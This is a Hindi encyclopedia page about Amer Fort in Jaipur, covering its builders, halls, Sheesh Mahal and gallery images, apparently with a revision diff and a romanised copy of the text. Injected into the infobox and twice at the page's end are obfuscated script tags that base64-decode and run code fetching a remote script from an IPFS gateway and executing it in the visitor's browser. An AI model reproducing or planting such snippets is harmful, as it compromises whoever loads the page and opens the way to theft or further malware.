Difference between revisions of "आमेर का क़िला जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(10 intermediate revisions by 7 users not shown)
Line 1: Line 1:
[[चित्र:Amber-Fort-Jaipur-2.jpg|thumb|250px|आमेर का क़िला, [[जयपुर]]]]
+
{{सूचना बक्सा ऐतिहासिक इमारत
*[[जयपुर]] शहर, [[राजस्थान]] की राजधानी से 11 कि.मी. दूर [[अरावली पर्वतमाला]] पर स्थित आमेर का क़िला [[राजपूत]] वास्‍तुकला का अद़भुत उदाहरण है।  
+
|चित्र=Amber-Fort-Jaipur-2.jpg
*आमेर का क़िला [[दिल्ली]] - जयपुर राजमार्ग की जंगली पहाडियों के बीच अपनी विशाल प्राचीरों सहित नीचे माओटा झील के पानी में छवि दिखाता खड़ा हुआ है।
+
|चित्र का नाम=आमेर क़िला
*प्राचीन काल में अम्‍बावती और अम्बिबकापुर के नाम से आमेर कछवाह राजाओं की राजधानी रहा है।  
+
|विवरण=हिन्दू और फ़ारसी शैली के मिश्रित स्‍वरूप का यह क़िला देश में अपना एक विशिष्‍ट स्‍थान रखता है।
 +
|राज्य=[[राजस्थान]]
 +
|नगर=[[जयपुर]]
 +
|निर्माता=
 +
|स्वामित्व=राजस्थान सरकार
 +
|प्रबंधक=
 +
|निर्माण=[[मानसिंह|राजा मानसिंह]] और [[जयसिंह|सवाई जयसिंह]]
 +
|वास्तुकार=
 +
|वास्तु शैली=
 +
|पुन: निर्माण=
 +
|स्थापना=1592 ई.
 +
|पुन: स्थापना=
 +
|भौगोलिक स्थिति=26° 59′ 9.24″ उत्तर, 75° 51′ 2.52″ पूर्व
 +
|मार्ग स्थिति=[[दिल्ली]]-[[जयपुर]] राजमार्ग की जंगली पहाड़ियों के बीच अपनी विशाल प्राचीरों सहित नीचे माओटा झील के पानी में छवि दिखाता हुआ खड़ा है।
 +
|प्रसिद्धि=दीवाने ख़ास और शीश महल पर्यटकों के आकर्षण का विशेष केन्‍द्र है।
 +
|एस.टी.डी. कोड=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=महल के मुख्‍य द्वार के बाहर [[कछवाहा वंश|कछवाहा]] राजाओं की कुल देवी शिला माता का मंदिर है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|18:46, 2 फ़रवरी 2015 (IST)}}
 +
}}
 +
'''आमेर का क़िला''' ([[अंग्रेज़ी]]: ''Amer Fort'') [[राजस्थान]] के [[जयपुर]] में स्थित एक ऐतिहासिक नगर [[आमेर]] में [[राजपूत]] [[वास्तुकला]] का अद़भुत उदाहरण है। आमेर का क़िला [[दिल्ली]] - [[जयपुर]] राजमार्ग की जंगली पहाड़ियों के बीच अपनी विशाल प्राचीरों सहित नीचे माओटा झील के पानी में छवि दिखाता हुआ खड़ा है। प्राचीन काल में अम्‍बावती और अम्बिबकापुर के नाम से आमेर कछवाह राजाओं की राजधानी रहा है।  
 +
==विशेषताएँ==
 
*आमेर क़िले के राजमहलों का निर्माण मिर्जा [[मानसिंह|राजा मानसिंह]] ने करवाया था।  
 
*आमेर क़िले के राजमहलों का निर्माण मिर्जा [[मानसिंह|राजा मानसिंह]] ने करवाया था।  
 
*[[जयसिंह|सवाई जयसिंह]] ने इसमें कुछ नये भवनों का निर्माण करवाया।  
 
*[[जयसिंह|सवाई जयसिंह]] ने इसमें कुछ नये भवनों का निर्माण करवाया।  
*[[हिन्‍दू शैली|हिन्‍दू]] और [[फारसी शैली]] के मिश्रित स्‍वरूप का यह क़िला देश में अपना एक विशिष्‍ट स्‍थान रखता है।  
+
*हिन्दू और फ़ारसी शैली के मिश्रित स्‍वरूप का यह क़िला देश में अपना एक विशिष्‍ट स्‍थान रखता है।  
 
*दीवान ए आम या जनता के दरबार का कक्ष महल के अंदर है और दीवान एक ख़ास या निजी श्रोताओं का कमरा और सुख निवास भी महल के अंदर है जहाँ वातानुकूलन के प्रयोजन हेतु पानी के झिरियों से गुजरती हुई ठण्‍डी हवा बहती है।
 
*दीवान ए आम या जनता के दरबार का कक्ष महल के अंदर है और दीवान एक ख़ास या निजी श्रोताओं का कमरा और सुख निवास भी महल के अंदर है जहाँ वातानुकूलन के प्रयोजन हेतु पानी के झिरियों से गुजरती हुई ठण्‍डी हवा बहती है।
[[चित्र:Jaipur-Amber-Fort.jpg|thumb|250px|अम्बर क़िला, [[जयपुर]]]]
+
*महल के मुख्‍य द्वार के बाहर [[कछवाहा वंश|कछवाहा]] राजाओं की कुल देवी शिला माता का मंदिर है।  
*महल के मुख्‍य द्वार के बाहर कछवाहा राजाओं की कुल देवी [[शिला माता]] का मंदिर है।  
 
 
*महल में घुसते ही 20 खम्‍भों का राजपूत भवन शैली पर सफ़ेद संगमरमर व लाल पत्‍थर का बना दीवाने आम है।  
 
*महल में घुसते ही 20 खम्‍भों का राजपूत भवन शैली पर सफ़ेद संगमरमर व लाल पत्‍थर का बना दीवाने आम है।  
 
*दीवाने ख़ास और शीश महल पर्यटकों के आकर्षण का विशेष केन्‍द्र है।  
 
*दीवाने ख़ास और शीश महल पर्यटकों के आकर्षण का विशेष केन्‍द्र है।  
*महल में [[मावठा झील]] से आती ठण्‍डी हवाओं का आनन्‍द लेने के लिये सुख निवास भी स्थित है।  
+
*महल में मावठा झील से आती ठण्‍डी हवाओं का आनन्‍द लेने के लिये सुख निवास भी स्थित है।  
 
*रानियों के लिये अनेक निजी कक्ष भी निर्मित है।
 
*रानियों के लिये अनेक निजी कक्ष भी निर्मित है।
 
*रानियों के निजी कक्षों में जालीदार परदों के साथ खिड़कियाँ हैं ताकि राज परिवार की महिलाऐं शाही दरबार में होने वाली कारवाइयों को गोपनीयता पूर्वक देख सकें।
 
*रानियों के निजी कक्षों में जालीदार परदों के साथ खिड़कियाँ हैं ताकि राज परिवार की महिलाऐं शाही दरबार में होने वाली कारवाइयों को गोपनीयता पूर्वक देख सकें।
  
{{प्रचार}}
+
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक=|पूर्णता= |शोध=}}
{{लेख प्रगति  
+
==वीथिका==
|आधार=
+
<gallery>
|प्रारम्भिक=प्रारम्भिक2
+
चित्र:Jaipur-Amber-Fort.jpg|अम्बर क़िला, [[जयपुर]]
|माध्यमिक=  
+
चित्र:Amber-Fort.jpg|आमेर क़िला, [[जयपुर]]
|पूर्णता=  
+
चित्र:Amber-Fort-Rajasthan.jpg|आमेर का क़िला, [[जयपुर]] (1860)
|शोध=
+
चित्र:Amber-Fort-Rajasthan-1.jpg|आमेर का क़िला, [[जयपुर]] (1867)
}}
+
चित्र:Amer-Fort.jpg|आमेर क़िला, [[जयपुर]]
 +
चित्र:Amer-Fort-Jaipur.jpg|आमेर का क़िला, [[जयपुर]]
 +
चित्र:Amer-Fort-Jaipur-5.jpg|आमेर के क़िले की यात्रा करते हुए सैलानी, [[जयपुर]]
 +
चित्र:Amer-Fort-Jaipur-6.jpg|आमेर का क़िला, [[जयपुर]]
 +
चित्र:Amer-Fort-Jaipur-7.jpg|आमेर के क़िले का प्रवेश द्वार, [[जयपुर]]
 +
</gallery>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{राजस्थान के पर्यटन स्थल}}
+
{{राजस्थान के पर्यटन स्थल}}{{भारत के दुर्ग}}
 
 
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]
[[Category:राजस्थान_के_पर्यटन_स्थल]]
+
[[Category:राजस्थान के पर्यटन स्थल]]
[[Category:पर्यटन कोश]]
+
[[Category:भारत के दुर्ग]][[Category:स्थापत्य कला]][[Category:ऐतिहासिक स्थल]][[Category:कला कोश]][[Category:पर्यटन कोश]][[Category:इतिहास कोश]]
 +
[[Category:जयपुर]]  
 
__INDEX__
 
__INDEX__

Latest revision as of 11:30, 16 July 2017

amer ka qila jayapur
vivaran hindoo aur farasi shaili ke mishrit sh‍varoop ka yah qila desh mean apana ek vishishh‍t sh‍than rakhata hai.
rajy rajasthan
nagar jayapur
svamitv rajasthan sarakar
nirman raja manasianh aur savaee jayasianh
sthapana 1592 ee.
bhaugolik sthiti 26° 59′ 9.24″ uttar, 75° 51′ 2.52″ poorv
marg sthiti dilli-jayapur rajamarg ki jangali paha diyoan ke bich apani vishal prachiroan sahit niche maota jhil ke pani mean chhavi dikhata hua kh da hai.
prasiddhi divane khas aur shish mahal paryatakoan ke akarshan ka vishesh kenh‍dr hai.
any janakari mahal ke mukhh‍y dvar ke bahar kachhavaha rajaoan ki kul devi shila mata ka mandir hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

amer ka qila (aangrezi: Amer Fort) rajasthan ke jayapur mean sthit ek aitihasik nagar amer mean rajapoot vastukala ka ad़bhut udaharan hai. amer ka qila dilli - jayapur rajamarg ki jangali paha diyoan ke bich apani vishal prachiroan sahit niche maota jhil ke pani mean chhavi dikhata hua kh da hai. prachin kal mean amh‍bavati aur ambibakapur ke nam se amer kachhavah rajaoan ki rajadhani raha hai.

visheshataean

  • amer qile ke rajamahaloan ka nirman mirja raja manasianh ne karavaya tha.
  • savaee jayasianh ne isamean kuchh naye bhavanoan ka nirman karavaya.
  • hindoo aur farasi shaili ke mishrit sh‍varoop ka yah qila desh mean apana ek vishishh‍t sh‍than rakhata hai.
  • divan e am ya janata ke darabar ka kaksh mahal ke aandar hai aur divan ek khas ya niji shrotaoan ka kamara aur sukh nivas bhi mahal ke aandar hai jahaan vatanukoolan ke prayojan hetu pani ke jhiriyoan se gujarati huee thanh‍di hava bahati hai.
  • mahal ke mukhh‍y dvar ke bahar kachhavaha rajaoan ki kul devi shila mata ka mandir hai.
  • mahal mean ghusate hi 20 khamh‍bhoan ka rajapoot bhavan shaili par safed sangamaramar v lal path‍thar ka bana divane am hai.
  • divane khas aur shish mahal paryatakoan ke akarshan ka vishesh kenh‍dr hai.
  • mahal mean mavatha jhil se ati thanh‍di havaoan ka ananh‍d lene ke liye sukh nivas bhi sthit hai.
  • raniyoan ke liye anek niji kaksh bhi nirmit hai.
  • raniyoan ke niji kakshoan mean jalidar paradoan ke sath khi dakiyaan haian taki raj parivar ki mahilaaian shahi darabar mean hone vali karavaiyoan ko gopaniyata poorvak dekh sakean.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>